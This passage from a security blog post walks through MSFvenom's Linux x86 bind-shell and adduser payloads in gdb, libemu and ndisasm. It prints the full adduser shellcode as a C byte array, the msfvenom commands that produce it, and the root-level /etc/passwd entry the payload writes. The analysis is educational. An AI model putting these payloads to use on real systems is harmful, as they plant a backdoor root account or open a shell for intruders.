Next, <strong>EAX<\/strong> which is set to <strong>0x0<\/strong> is pushed to the stack to account for the <strong>argv<\/strong> argument. As neither <strong>argv<\/strong> or <strong>envp<\/strong> are needed to be set for our call to <strong>\/bin\/sh<\/strong>, both of these values are set to null.<\/p>\n\n\n\n<p>Finally, <strong>ESP<\/strong> is moved into the <strong>ECX<\/strong> and the value <strong>0xb<\/strong> is moved into <strong>AL<\/strong> for the syscall prior to it being called. The result is a fully working bind shell.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis with GDB<\/h3>\n\n\n\n<p>Next, we perform a dynamic analysis using gdb by stepping through the program one instruction at a time.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Compilation and setup<\/h3>\n\n\n\n<p>Before we begin, we use MSFvenom to output the bind shell shellcode into C format:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503081934.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then insert the shellcode into our C skeleton code, which we compile using gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\ngcc -fno-stack-protector -z execstack shell_bind_tcp_shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505080412.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, we launch gdb and set a breakpoint to the main function:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503082051.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We run the main program and hit the breakpoint, positioning us at the start of the program:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503082132.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We can use the <strong>disassemble<\/strong> command to break down the assembly instructions making up the shellcode:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503082206.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then set a breakpoint to the start of the linux\/x86\/shell_bind_tcp shellcode payload so we can begin stepping through it:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220503082539.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">socket analysis<\/h4>\n\n\n\n<p>We first step to the soft interrupt call for <strong>socket<\/strong> and step through the instructions to the first syscall at <strong>0x40404d<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504212000.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x66<\/strong> for the <strong>socketcall<\/strong> syscall, <strong>EBX<\/strong> is set to 1 to indicate we are calling <strong>socket<\/strong>, and <strong>ECX<\/strong> is pointing to an <strong>socket<\/strong> arguments on the stack.<\/p>\n\n\n\n<p>We can examine the socket arguments on the stack, and see they are set as follows:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504214538.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">bind analysis<\/h4>\n\n\n\n<p>We step to the syscall to <strong>bind<\/strong> and assess the arguments set at <strong>0x404060<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504213305.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x66<\/strong> for the <strong>socketcall<\/strong> syscall, <strong>EBX<\/strong> is set to 2 to indicate we are calling <strong>bind<\/strong>, and <strong>ECX<\/strong> is pointing to the <strong>bind<\/strong> arguments on the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504214230.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">listen analysis<\/h4>\n\n\n\n<p>We next step to the syscall to <strong>listen<\/strong> and analyse the arguments set at <strong>0x404069<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504220828.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x66<\/strong> for the <strong>socketcall<\/strong> syscall, <strong>EBX<\/strong> is set to <strong>0x4<\/strong> to indicate we are calling <strong>listen<\/strong>, and <strong>ECX<\/strong> is pointing to the <strong>listen<\/strong> arguments on the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504221302.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">accept analysis<\/h4>\n\n\n\n<p>We next step to the syscall for <strong>accept<\/strong> and analyse the arguments set at <strong>0x40406e<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504215028.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x66<\/strong> for the <strong>socketcall<\/strong> syscall, <strong>EBX<\/strong> is set to <strong>0x5<\/strong> to indicate we are calling <strong>accept<\/strong>, and <strong>ECX<\/strong> is pointing to the <strong>listen<\/strong> arguments on the stack.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504215805.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">dup2 analysis<\/h4>\n\n\n\n<p>We next step to the syscall for <strong>dup2<\/strong> and analyse the arguments set at <strong>0x404075<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504221756.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is set to <strong>0x3F<\/strong> for the <strong>dup2<\/strong> syscall, <strong>EBX<\/strong> is set to <strong>0x4<\/strong>, which is the <strong>sockfd<\/strong> obtained from the connecting client, and will be used as the <strong>newfd<\/strong> argument. <strong>ECX<\/strong>, in this case stores the <strong>oldfd<\/strong>, and will iterate over 0, 1 and 2 for STDIN, STDOUT and STDERR:<\/p>\n\n\n\n<p>First call is made for STDERR:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504222344.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Second call is made for STDOUT:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504222521.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Final call is made for STDIN:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504222646.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">execve analysis<\/h4>\n\n\n\n<p>Finally, the syscall to <strong>execve<\/strong> is made. We analyse the arguments set at <strong>0cx40408c<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504222920.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We note that the <strong>pathname<\/strong> argument is pointed to by the <strong>EBX<\/strong> register, and the remainder of the arguments are set to null.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504223133.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Following this call, the assembly code transfers control over to the <strong>\/bin\/sh<\/strong> program, completing implementation of the bind shell.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220504223320.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Next, we move onto an analysis of the MSFvenom <strong>linux\/x86\/adduser<\/strong> shellcode.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 2: linux\/x86\/adduser<\/h2>\n\n\n\n<p>According to the description provided by <strong>MSFvenom<\/strong>, the <strong>linux\/x86\/adduser<\/strong> shellcode payload is designed to create a new user on the target system with root permissions (UID of 0).<\/p>\n\n\n\n<p>Understanding the payload options, this shellcode specifies a <strong>username<\/strong>, <strong>password<\/strong> and (optionally) and <strong>shell<\/strong> for the new user to use. By default, the username and password will both be set to <strong>metasploit<\/strong> and will set the shell to <strong>\/bin\/sh<\/strong>.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/opt\/libemu\/tools\/sctest]\n\u2514\u2500# msfvenom -p linux\/x86\/adduser --list-options                                                1 \u2a2f 1 \u2699\nOptions for payload\/linux\/x86\/adduser:\n=========================\n\n       Name: Linux Add User\n     Module: payload\/linux\/x86\/adduser\n   Platform: Linux\n       Arch: x86\nNeeds Admin: Yes\n Total size: 97\n       Rank: Normal\n\nProvided by:\n    skape &lt;mmiller@hick.org&gt;\n    vlad902 &lt;vlad902@gmail.com&gt;\n    spoonm &lt;spoonm@no$email.com&gt;\n\nBasic options:\nName   Current Setting  Required  Description\n----   ---------------  --------  -----------\nPASS   metasploit       yes       The password for this user\nSHELL  \/bin\/sh          no        The shell for this user\nUSER   metasploit       yes       The username to create\n\nDescription:\n  Create a new user with UID 0\n<\/pre><\/div>\n\n\n<p>To validate that this is the true functionality of the shellcode, we will perform analysis in the next section.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Emulation with Libemu<\/h3>\n\n\n\n<p>To begin, we use the <strong>sctest<\/strong> program from Libemu to emulate the <strong>linux\/x86\/adduser<\/strong> shellcode.<\/p>\n\n\n\n<p>We supply the arguments as follows:<\/p>\n\n\n\n<p><strong>msfvenom<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-p<\/strong>: Payload option set to linux\/x86\/adduser<\/li>\n\n\n\n<li><strong>R<\/strong>: Output shellcode in raw bytes<\/li>\n<\/ul>\n\n\n\n<p><strong>sctest<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-vvv<\/strong>: Set verbosity mode to 3.<\/li>\n\n\n\n<li><strong>-S<\/strong>: Read shellcode from stdin<\/li>\n\n\n\n<li><strong>-s<\/strong>: Run for 10,000 steps<\/li>\n\n\n\n<li><strong>-G<\/strong>: Save graphical output<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/adduser R | .\/sctest -vvv -Ss 10000 -G adduser.dot\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngraph file adduser.dot\nverbose = 3\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 97 bytes\n\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417000\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: \n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417000\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: \n&#x5B;emu 0x0x75f640 debug ] 31C9                            xor ecx,ecx\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417002\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF \n&#x5B;emu 0x0x75f640 debug ] 89CB                            mov ebx,ecx\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417004\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF \n&#x5B;emu 0x0x75f640 debug ] 6A46                            push byte 0x46\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417006\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF \n&#x5B;emu 0x0x75f640 debug ] 58                              pop eax\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417007\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000046  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF \n&#x5B;emu 0x0x75f640 debug ] CD80                            int 0x80\nstepcount 4\ncopying vertexes\noptimizing graph\nvertex 0x7c0850\ngoing forwards from 0x7c0850\n -&gt; vertex 0x7c0a70\n -&gt; vertex 0x7c0b60\n -&gt; vertex 0x7c0c40\ncopying edges for 0x7c0c40\nvertex 0x7c0e30\ngoing forwards from 0x7c0e30\ncopying edges for 0x7c0e30\n&#x5B;emu 0x0x75f640 debug ] cpu state    eip=0x00417009\n&#x5B;emu 0x0x75f640 debug ] eax=0x00000046  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x75f640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x75f640 debug ] Flags: PF ZF\n<\/pre><\/div>\n\n\n<p>For this payload, considerably less information is returned by using Libemu, meaning we will have to rely on the other two tools to better grasp how it is working.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Disassembly with Ndisasm<\/h3>\n\n\n\n<p>Next, we use ndisasm to disassemble the shellcode generated by MSFvenom. The payload gets broken down into its assembly instructions as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/adduser R | ndisasm -u -                                                  1 \u2699\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 97 bytes\n\n00000000  31C9              xor ecx,ecx\n00000002  89CB              mov ebx,ecx\n00000004  6A46              push byte +0x46\n00000006  58                pop eax\n00000007  CD80              int 0x80\n00000009  6A05              push byte +0x5\n0000000B  58                pop eax\n0000000C  31C9              xor ecx,ecx\n0000000E  51                push ecx\n0000000F  6873737764        push dword 0x64777373\n00000014  682F2F7061        push dword 0x61702f2f\n00000019  682F657463        push dword 0x6374652f\n0000001E  89E3              mov ebx,esp\n00000020  41                inc ecx\n00000021  B504              mov ch,0x4\n00000023  CD80              int 0x80\n00000025  93                xchg eax,ebx\n00000026  E828000000        call 0x53\n0000002B  6D                insd\n0000002C  657461            gs jz 0x90\n0000002F  7370              jnc 0xa1\n00000031  6C                insb\n00000032  6F                outsd\n00000033  69743A417A2F6449  imul esi,&#x5B;edx+edi+0x41],dword 0x49642f7a\n0000003B  736A              jnc 0xa7\n0000003D  3470              xor al,0x70\n0000003F  3449              xor al,0x49\n00000041  52                push edx\n00000042  633A              arpl &#x5B;edx],di\n00000044  303A              xor &#x5B;edx],bh\n00000046  303A              xor &#x5B;edx],bh\n00000048  3A2F              cmp ch,&#x5B;edi]\n0000004A  3A2F              cmp ch,&#x5B;edi]\n0000004C  62696E            bound ebp,&#x5B;ecx+0x6e]\n0000004F  2F                das\n00000050  7368              jnc 0xba\n00000052  0A598B            or bl,&#x5B;ecx-0x75]\n00000055  51                push ecx\n00000056  FC                cld\n00000057  6A04              push byte +0x4\n00000059  58                pop eax\n0000005A  CD80              int 0x80\n0000005C  6A01              push byte +0x1\n0000005E  58                pop eax\n0000005F  CD80              int 0x80\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505074254.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Whilst this output gives us the assembly instructions, we need to do a bit of digging to identify the syscalls that are performed. We can backtrace this based on the value stored in the <strong>EAX<\/strong> register prior to each call to <strong>int 0x80<\/strong>.<\/p>\n\n\n\n<p>From this, we pick out a list of syscalls using the following syscall numbers:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0x46 - syscall 70 - <strong>setreuid<\/strong><\/li>\n\n\n\n<li>0x5 - syscall 5 - <strong>open<\/strong><\/li>\n\n\n\n<li>0x4 - syscall 4 - <strong>write<\/strong><\/li>\n\n\n\n<li>0x1 - syscall 1 - <strong>exit<\/strong><\/li>\n<\/ul>\n\n\n\n<p>Below are the function headers of each syscall in the adduser payload which we have taken from the Ndisasm output:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint setreuid(uid_t ruid, uid_t euid);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint open(const char *pathname, int flags);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nssize_t write(int fd, const void *buf, size_t count);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nvoid exit(int status);\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis with GDB<\/h3>\n\n\n\n<p>Next, we perform a dynamic analysis using gdb by stepping through the program an instruction at a time.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Compilation and setup<\/h4>\n\n\n\n<p>Before we begin, we use MSFvenom to output the shellcode into C format:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/adduser -f C                                                              1 \u2699\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 97 bytes\nFinal size of c file: 433 bytes\nunsigned char buf&#x5B;] = \n&quot;\\x31\\xc9\\x89\\xcb\\x6a\\x46\\x58\\xcd\\x80\\x6a\\x05\\x58\\x31\\xc9\\x51&quot;\n&quot;\\x68\\x73\\x73\\x77\\x64\\x68\\x2f\\x2f\\x70\\x61\\x68\\x2f\\x65\\x74\\x63&quot;\n&quot;\\x89\\xe3\\x41\\xb5\\x04\\xcd\\x80\\x93\\xe8\\x28\\x00\\x00\\x00\\x6d\\x65&quot;\n&quot;\\x74\\x61\\x73\\x70\\x6c\\x6f\\x69\\x74\\x3a\\x41\\x7a\\x2f\\x64\\x49\\x73&quot;\n&quot;\\x6a\\x34\\x70\\x34\\x49\\x52\\x63\\x3a\\x30\\x3a\\x30\\x3a\\x3a\\x2f\\x3a&quot;\n&quot;\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x0a\\x59\\x8b\\x51\\xfc\\x6a\\x04\\x58&quot;\n&quot;\\xcd\\x80\\x6a\\x01\\x58\\xcd\\x80&quot;;\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505080114.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then compile the shellcode with gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngcc -fno-stack-protector -z execstack adduser_shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505080434.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, we launch gdb and set a breakpoint to the main function using the <strong>break<\/strong> command:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505082849.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Run the main program and hit the breakpoint, positioning us at the start of the program:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505082927.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We can then use the <strong>disassemble<\/strong> command to break down the assembly instructions making up the shellcode:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505083056.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then set a breakpoint to the start of the linux\/x86\/adduser shellcode payload so we can analyse it:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505083239.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">setreuid analysis<\/h4>\n\n\n\n<p>We first step to the syscall for <strong>setreuid<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505083519.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Above, we note that <strong>EAX<\/strong> is populated by the system call value <strong>0x46<\/strong> for the <strong>setreuid<\/strong> syscall, with <strong>EBX<\/strong> and <strong>ECX<\/strong> set to 0.<\/p>\n\n\n\n<p>Based on the manual page entry for <strong>setreuid<\/strong>, the syscall is used to set the effective user IDs of the calling process. As adding a new user to the <strong>\/etc\/passwd<\/strong> file requires root permissions, both the <strong>ruid<\/strong> and <strong>euid<\/strong> arguments are set to 0 for root.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">open analysis<\/h4>\n\n\n\n<p>Next, we step to the syscall for <strong>open<\/strong> and analyse the arguments.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505084841.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>In the <strong>EAX<\/strong> register, we note that the syscall for <strong>open<\/strong> (<strong>0x5<\/strong>) is present. In <strong>EBX<\/strong>, the pointer to the filepath for <strong>\/etc\/passwd<\/strong> is stored. <strong>ECX<\/strong>, which contains the <strong>flags<\/strong> argument contains the value <strong>0x401<\/strong>.<\/p>\n\n\n\n<p>By referring to \/usr\/include\/asm-generic\/fcntl.h, we can see that the flag setting of <strong>0x401<\/strong> is a combination of the <strong>O_WRONLY<\/strong> and <strong>O_NOCTTY<\/strong> options, which indicates <strong>open<\/strong> is being used to <strong>write<\/strong> to the file and to not make the provided file the <a href=\"https:\/\/www.gnu.org\/software\/libc\/manual\/html_node\/Open_002dtime-Flags.html\">controlling terminal for the process<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220505085910.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">write analysis<\/h4>\n\n\n\n<p>Once the <strong>\/etc\/passwd<\/strong> file has been opened, a <strong>call<\/strong> instruction is made.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506072747.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This instruction moves EIP to the location <strong>0x404093<\/strong> and resumes execution.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506073509.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>When we step into this instruction, we note that the <strong>ESP<\/strong> register is pointing to a string which it will write to the chosen file. This string is a new user entry for the default option 'metasploit', and will be appended to the \/etc\/passwd file following this call.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506073711.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>At the time of the call to <strong>write<\/strong>, we see that <strong>EAX<\/strong> contains the syscall number of <strong>0x4<\/strong>, <strong>EBX<\/strong> contains the file descriptor (<strong>fd<\/strong>) of the \/etc\/passwd file, <strong>ECX<\/strong> contains the string to write to the file (<strong>*buf<\/strong>) and <strong>EDX<\/strong> contains the number of bytes (<strong>count<\/strong>) to write from the string which is 0x28 (40 bytes).<\/p>\n\n\n\n<p>The string in <strong>ECX<\/strong> is set to <strong>\"metasploit:Az\/dIsj4p4IRc:0:0::\/:\/bin\/sh\\nY\\213Q\\374j\\004Xj\\001X\"<\/strong>, using the <strong>JMP-CALL-POP<\/strong> technique. As <strong>count<\/strong> \/ <strong>EDX<\/strong> is set to 0x28, this means that the first 39 bytes will be written to \/etc\/passwd.<\/p>\n\n\n\n<p>In this case, the string we will see appended to the \/etc\/passwd file 